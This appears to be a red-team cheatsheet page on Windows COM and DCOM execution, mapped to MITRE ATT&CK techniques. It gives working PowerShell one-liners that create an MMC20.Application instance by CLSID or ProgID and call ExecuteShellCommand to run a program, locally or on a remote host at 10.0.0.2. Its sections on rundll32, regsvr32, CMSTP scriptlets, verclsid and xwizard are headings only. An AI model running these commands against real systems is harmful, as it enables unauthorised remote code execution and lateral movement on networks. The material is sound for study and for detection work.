πCOM Execution - T1559.001
Templates and methods of quickly executing COM and DCOM
Windows Components Object Model quick execution cheatsheet
Powershell
Using Powershell with dotnet notation to quickly create a COM or DCOM instance using either CLSID or ProgID
Execution via CLSID
$a = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("49B2791A-B1AE-4C90-9B8E-E860BA07F889"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")Execution via ProgID
$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")DCOM Execution
Distributed COM is an extension of COM, which enables remote execution of COM among other things. Note that DCOM can also be executed Locally by specifying the loopback interface (127.0.0.1)
$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","10.0.0.2"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")Rundll32
Execution via CLSID
Execution via ProgID
Execution via shell32.dll
Scriptlet Execution from Remote Server
Remote Scriptlet via INF file
Regsvr32
COM Local Scriptlet Execution
COM Scriptlet Execution from Remote Server
CMSTP
Execution via INF file that downloads and executes a scriptlet (sct)
PyCOM
π οΈ
Verclsid
Execution via CLSID
Xwizard
Execution via CLSID
ATT&CK Techniques in this Page
Command and Scripting Interpreter: PowerShell - T1059.001
Inter-Process Communication: Component Object Model - T1559.001
System Binary Proxy Execution: CMSTP - T1218.003
System Binary Proxy Execution: Rundll32 - T1218.011
System Binary Proxy Execution: Verclsid - T1218.012
System Binary Proxy Execution: Regsvr32 - T1218.010
Last updated
Was this helpful?